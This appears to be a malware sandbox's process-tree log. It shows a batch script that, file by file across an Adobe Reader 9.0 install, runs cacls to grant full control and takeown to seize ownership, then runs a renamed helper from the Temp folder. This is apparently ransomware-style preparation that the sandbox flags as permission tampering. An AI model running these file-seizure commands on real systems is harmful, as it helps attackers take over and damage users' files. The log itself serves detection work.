C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:364
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:1652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:1188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:284
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:2020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:1400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:1880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "brt.fca" -nobanner3⤵PID:1804
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "brt.fca" -nobanner4⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵
- Modifies file permissions
PID:872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:1548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:748
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "can129.hsp" -nobanner3⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "can129.hsp" -nobanner4⤵PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:1428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "usa37.hyp" -nobanner3⤵PID:708
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "usa37.hyp" -nobanner4⤵PID:1196
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵
- Modifies file permissions
PID:1288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:1484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:1672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:604
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:1388
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:1572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "brt04.hsp" -nobanner3⤵PID:292
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "brt04.hsp" -nobanner4⤵PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:1664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "bl.gif" -nobanner3⤵PID:1056
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "bl.gif" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:1312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:1400
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:1672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "reviewers.gif" -nobanner4⤵PID:604
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:1528
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "rss.gif" -nobanner3⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "rss.gif" -nobanner4⤵PID:520
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵
- Modifies file permissions
PID:1628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "trash.gif" -nobanner3⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "trash.gif" -nobanner4⤵PID:1196
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:1248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:1164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Identity-V" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Identity-V" -nobanner4⤵PID:324
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:1312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
PID:1056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:944
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:1292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵
- Modifies file permissions
PID:1616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "eng.hyp" -nobanner3⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "eng.hyp" -nobanner4⤵PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "zy______.pfm" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "zy______.pfm" -nobanner4⤵PID:1288
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:708
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:1040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:1760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:2020
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:1672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "can.hyp" -nobanner3⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "can.hyp" -nobanner4⤵PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵
- Modifies file permissions
PID:612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "usa03.hsp" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "usa03.hsp" -nobanner4⤵PID:1628
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:1616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:1020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:1664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:1880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:316
-
-
-
